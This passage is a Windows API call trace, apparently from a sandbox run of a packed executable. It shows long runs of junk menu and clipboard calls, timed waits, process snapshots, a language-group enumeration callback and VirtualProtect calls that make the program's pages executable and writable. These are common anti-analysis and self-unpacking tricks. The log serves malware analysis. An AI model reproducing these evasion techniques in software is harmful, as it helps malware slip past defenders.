uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.736] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.737] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.738] SetWindowLongA (hWnd=0x0, nIndex=-4, dwNewLong=4207472) returned 0 [0100.738] DestroyWindow (hWnd=0x0) returned 0 [0100.738] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0xfffc4830, lParam=0x35e9481) returned 0x0 [0100.738] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d12c0 [0100.738] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d12d0 [0100.738] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d12f8 [0100.738] GetCursorPos (in: lpPoint=0x18f3d4 | out: lpPoint=0x18f3d4*(x=837, y=453)) returned 1 [0100.738] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="xxx") returned 0x100 [0100.738] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0100.738] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0100.738] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=837, y=453)) returned 1 [0100.738] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0100.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0100.741] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0100.741] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0100.741] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0103.733] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0103.733] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0103.733] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=837, y=453)) returned 1 [0103.733] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0103.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x110 [0103.735] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0103.735] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0103.736] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0106.728] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0106.728] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0106.728] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=1116, y=737)) returned 1 [0106.728] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0106.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c [0106.730] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0106.730] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0106.730] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0109.724] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0109.724] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0109.724] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=1116, y=737)) returned 1 [0109.724] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0109.724] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x114 [0109.730] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0109.730] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0109.730] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0112.719] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0112.719] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0112.719] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=1116, y=737)) returned 1 [0112.719] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0112.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0112.723] lstrlenA (lpString="") returned 0 [0112.724] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x18f384 | out: psizl=0x18f384) returned 1 [0112.724] GetIconInfo (in: hIcon=0x0, piconinfo=0x0 | out: piconinfo=0x0) returned 0 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.724] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.725] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.726] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] IsClipboardFormatAvailable (format=0x1) returned 1 [0112.727] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12f8 | out: hHeap=0x34d0000) returned 1 [0112.727] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12d0 | out: hHeap=0x34d0000) returned 1 [0112.727] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12c0 | out: hHeap=0x34d0000) returned 1 [0112.727] lstrcpyA (in: lpString1=0x18f6c4, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0112.727] lstrlenA (lpString="\x7f") returned 1 [0112.727] lstrcpyA (in: lpString1=0x18f7cc, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0112.727] lstrcatA (in: lpString1="\x7f", lpString2="\\*" | out: lpString1="\x7f\\*") returned="\x7f\\*" [0112.727] FindFirstFileA (in: lpFileName="\x7f\\*", lpFindFileData=0x18f9d4 | out: lpFindFileData=0x18f9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0112.729] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0112.729] lstrcpyA (in: lpString1=0x18f7cc, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0112.729] lstrcatA (in: lpString1="\x7f", lpString2="\\" | out: lpString1="\x7f\\") returned="\x7f\\" [0112.729] lstrcatA (in: lpString1="\x7f\\", lpString2="" | out: lpString1="\x7f\\") returned="\x7f\\" [0112.729] FindNextFileA (in: hFindFile=0xffffffff, lpFindFileData=0x18f9d4 | out: lpFindFileData=0x18f9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0112.729] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0112.729] GetDlgItem (hDlg=0x0, nIDDlgItem=1555444658) returned 0x0 [0112.729] FindWindowA (lpClassName="ConsoleWindowClass", lpWindowName=0x0) returned 0x0 [0112.729] GetDC (hWnd=0x0) returned 0x3010844 [0112.729] CreatePen (iStyle=0, cWidth=1, color=0xffffff) returned 0x673006a9 [0112.729] CreateSolidBrush (color=0x0) returned 0x1c100746 [0112.730] SelectObject (hdc=0x3010844, h=0x673006a9) returned 0x1b00017 [0112.730] SelectObject (hdc=0x3010844, h=0x1c100746) returned 0x1900010 [0112.730] Ellipse (hdc=0x3010844, left=-243664, top=56530052, right=-243657, bottom=56530059) returned 1 [0112.731] Ellipse (hdc=0x3010844, left=-243657, top=56530052, right=-243650, bottom=56530059) returned 1 [0112.731] CreateSolidBrush (color=0xff) returned 0x15100684 [0112.731] GetConsoleTitleA (in: lpConsoleTitle=0x18f464, nSize=0x50 | out: lpConsoleTitle="Èâ0") returned 0x0 [0112.731] FindWindowA (lpClassName=0x0, lpWindowName="Èâ0") returned 0x0 [0112.731] NtdllDefWindowProc_A (hWnd=0x0, Msg=0xfffc4830, wParam=0x5cb633b2, lParam=0x241bc34a) returned 0x0 [0112.731] GetDlgItem (hDlg=0x0, nIDDlgItem=801) returned 0x0 [0112.731] SendMessageA (hWnd=0x0, Msg=0x5cb633b2, wParam=0x1, lParam=0x0) returned 0x0 [0112.731] SendMessageA (hWnd=0x0, Msg=0x5cb633b2, wParam=0x418390, lParam=0x18f378) returned 0x0 [0112.731] GetDlgItem (hDlg=0x0, nIDDlgItem=801) returned 0x0 [0112.731] GetClientRect (in: hWnd=0x0, lpRect=0x18f3f4 | out: lpRect=0x18f3f4) returned 0 [0112.731] EnumSystemLanguageGroupsA (lpLanguageGroupEnumProc=0x290000, dwFlags=0x1, lParam=0x0) [0116.133] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0116.133] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0135.950] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x2) returned 1 [0135.950] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.951] VirtualProtect (in: lpAddress=0x402000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.951] VirtualProtect (in: lpAddress=0x403000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.951] VirtualProtect (in: lpAddress=0x404000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.951] VirtualProtect (in: lpAddress=0x405000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.951] VirtualProtect (in: lpAddress=0x406000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.952] VirtualProtect (in: lpAddress=0x407000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0135.952] VirtualProtect (in: lpAddress=0x408000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) 